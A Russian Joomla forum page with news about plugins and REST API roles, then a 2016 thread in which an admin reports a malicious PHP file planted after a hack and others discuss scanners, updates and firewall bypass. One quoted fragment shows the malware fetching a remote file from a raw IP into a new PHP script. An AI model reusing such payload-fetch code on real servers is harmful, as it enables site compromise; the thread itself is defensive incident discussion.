Новости Joomla

Joomla REST API без прав суперадминистратора. RBAC в Joomla

Joomla REST API без прав суперадминистратора. RBAC в Joomla

👩‍💻 Joomla REST API без прав суперадминистратора. RBAC в Joomla.На канале известного французского разработчика и специалиста по Joomla REST API Alexandre ELISÉ вышло новое видео.RBAC (Role-Based Access Control) - это управление доступом на основе ролей, метод управления доступом к ресурсам, основанный на назначении ролей пользователям. Вместо назначения прав каждому пользователю точечно права доступа группируются по ролям, а пользователи получают доступ к ресурсам уже в зависимости от своей роли. В контексте Joomla и REST API он может даже мешать работе: без авторизованного пользователя вы не можете даже показать контент. В видео показано как решить данную проблему. Создаётся "технический пользователь", которому разрешается просматривать контент, но не разрешено создавать, редактировать, удалять и т.д. И все запросы к REST API идут с использованием его токена. [fr-FR] Services Web API Joomla SANS être Super Admin RBAC natif avec Joomla@joomlafeed #joomla #разработка #rest

InterLinked - плагин автоматической внутренней перелинковки для Joomla

InterLinked - плагин автоматической внутренней перелинковки для Joomla

👩‍💻 InterLinked - плагин автоматической внутренней перелинковки для Joomla.Несвязанные статьи - это молчаливый убийца привлекательности вашего сайта на Joomla, который заставляет читателей сворачивать работу и подрывает эффективность вашего SEO. Content - InterLinked - это бесплатный, проверенный в боях плагин, который кладет конец этой бессмыслице, автоматически генерируя ссылки на основе ключевых слов между статьями на вашем сайте Joomla 5. Он создает сеть связей, используя ключевые слова статей (metakey) и ассоциации категорий, с настраиваемыми всплывающими подсказками, целевыми объектами ссылок и классами CSS, сохраняя при этом существующие ссылки и повышая производительность за счет кэширования. Кроме того, ссылки со временем меняются по мере того, как в новых статьях используются ключевые слова, что делает ваш контент свежим и актуальным.Возможности.- автоматическая перелинковка на основе значения meta-keywords материалов- встроенная поддержка материалов Joomla- пользовательские ассоциации категорий для создания ссылок (например "Блог" к "Учбеникам")- показ всплывающих подсказок к автоматическим ссылкам (опционально)- настраиваемый атрибут target для ссылок.- указание CSS класса для стилизации ссылок- кэширование совпадений ключевых слов и их ассоциаций- учёт существующих тегов <a> во избежание дублирующих ссылок- автоматическое добавление новых ссылок при появлении новых ассоциаций- веб-доступность: ARIA для ссылок с target="_blank".Плагин бесплатный. Заявлена поддержка Joomla 4 и Joomla 5.Joomla Extensions DirectoryСтраница расширенияСкачать@joomlafeed#joomla #расширения #seo

joomLab Gallery - плагин галереи изображений для Joomla

👩‍💻 joomLab Gallery - плагин галереи изображений для Joomla.Плагин joomLab Gallery позволит Вам добавлять в любой материал неограниченное количество галерей, а главное удобно управлять файлами и эффектами в каждой галерее.Плагин использует популярны скрипты Swiper.js и FancyBox. Первый для крутой организации и эффектов галерей, а второй для красивого и функционального показа оригинальных изображений на Вашем сайте.На данный момент плагин имеет 10 макетов вывода - это 10 различных эффектов галерей и Вы можете совмещать все 10 в 1 материале.Плагин позволяет гибко настраивать индивидуально каждую галерею в материале. Вы можете выбрать макет, эффекты и даже можете управлять функциями всплывающего окна изображения.Недостатки.Такой вид реализации не предусматривает выбор изображения на сервере. Т.е. Вы не можете выбрать уже добавленное фото, только загружать заново. Плагин не предоставляет возможности доступа к медиа-менеджеру.Плагин бесплатный. Разработчик - участник нашего сообщества Александр Новиков (@pro-portal).Страница расширения@joomlafeed#joomla #расширения

1   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 11 Ответов
  • 1254 Просмотров
*

likrion

  • Давно я тут
  • 750
  • 129 / 2
Оставили подарок в корневом каталоге сайта
« : 07.09.2016, 16:20:55 »
файл 89.php
Спойлер
[свернуть]

не забывайте обновлять систему
Записан
R331474010295
*

SeBun

  • BanMaster
  • 4030
  • 259 / 5
  • @SeBun48
Re: Оставили подарок в корневом каталоге сайта
« Ответ #1 : 07.09.2016, 17:03:28 »
А шелл нашли, который этот файл создал?
Записан
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Оставили подарок в корневом каталоге сайта
« Ответ #2 : 07.09.2016, 17:26:39 »
А этот файл 69.php на другом сервере ?
Код
http://85.185.123.123/images/.x/x.txt','./69.php'
Записан
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Оставили подарок в корневом каталоге сайта
« Ответ #3 : 07.09.2016, 18:02:30 »
@likrion
он такой красивый должен быть не один
Цитата: draff от 07.09.2016, 17:26:39
А этот файл 69.php на другом сервере ?
Код
http://85.185.123.123/images/.x/x.txt','./69.php'
скорей всего на том что и 89
Записан
*

likrion

  • Давно я тут
  • 750
  • 129 / 2
Re: Оставили подарок в корневом каталоге сайта
« Ответ #4 : 07.09.2016, 18:26:31 »
Спойлер
[свернуть]
Записан
R331474010295
*

wishlight

  • Гуру
  • 5059
  • 315 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Оставили подарок в корневом каталоге сайта
« Ответ #5 : 07.09.2016, 18:49:41 »
Версия php какая?

Со второй строчки все плохое скорее всего.

Версии найденных CMS
Joomla v3.3.3

Обновляться надо. Как видим RSFirewall бесполезен.
Записан
*

likrion

  • Давно я тут
  • 750
  • 129 / 2
Re: Оставили подарок в корневом каталоге сайта
« Ответ #6 : 07.09.2016, 19:14:51 »
php 5.6.12, но сканировали сайт очень долго, на протяжении полугода....это первый взломанный у меня сайт..и наверное это станет сильным пинком для сознания онлайн firewall для сайтов..один неверный запрос и IP будет блокироваться на серверном уровне...надо уже прекращать этот бред и делать автоматику по сбору уязвимостей бессмысленной
« Последнее редактирование: 07.09.2016, 19:47:40 от likrion »
Записан
R331474010295
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Оставили подарок в корневом каталоге сайта
« Ответ #7 : 07.09.2016, 19:31:37 »
Цитата: wishlight от 07.09.2016, 18:49:41
Со второй строчки все плохое скорее всего.
Точнее не бывает, проверка на наличие определенного набора символов в запросе.
Сканер айболит запускался в параноидальном режиме?
Записан
*

likrion

  • Давно я тут
  • 750
  • 129 / 2
Re: Оставили подарок в корневом каталоге сайта
« Ответ #8 : 07.09.2016, 19:45:23 »
Цитата: draff от 07.09.2016, 19:31:37
Точнее не бывает, проверка на наличие определенного набора символов в запросе.
Сканер айболит запускался в параноидальном режиме?
нет
Записан
R331474010295
*

likrion

  • Давно я тут
  • 750
  • 129 / 2
Re: Оставили подарок в корневом каталоге сайта
« Ответ #9 : 07.09.2016, 20:01:18 »
сайт.ру/libraries/library.php

Спойлер
[свернуть]
Записан
R331474010295
*

likrion

  • Давно я тут
  • 750
  • 129 / 2
Re: Оставили подарок в корневом каталоге сайта
« Ответ #10 : 07.09.2016, 20:06:03 »
сайт.ру/plugins/authentication/joomla/joomla.php

в шапке файла

Спойлер
[свернуть]

Записан
R331474010295
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Оставили подарок в корневом каталоге сайта
« Ответ #11 : 07.09.2016, 20:48:05 »
Цитата: wishlight от 07.09.2016, 18:49:41
Как видим RSFirewall бесполезен.
Я еще примерно пол года назад, где то тут в темах скидывал моменты обхода этого фаервола, а те кто проливают шелы, у них подобные моменты на вооружения, тут постоянно следить за сайтом надо....
Записан
1   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

 Ответов: 6
Просмотров: 2827 		Последний ответ 31.03.2024, 16:14:32
от SeBun
Компоненты и скрипты для защиты сайта. Логи атак на сайты

Автор wishlight

 Ответов: 678
Просмотров: 264809 		Последний ответ 14.09.2022, 14:29:43
от wishlight
Способы защиты сайта от DDoS атак?

Автор IgorMJ

 Ответов: 7
Просмотров: 2575 		Последний ответ 05.10.2021, 21:39:26
от ShopES
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

 Ответов: 11
Просмотров: 2250 		Последний ответ 03.11.2020, 17:36:03
от Cedars
Мониторинг файлов CMS и сайта - предлагаю решение

Автор GRIG

 Ответов: 18
Просмотров: 4933 		Последний ответ 28.08.2020, 22:00:30
от cntrl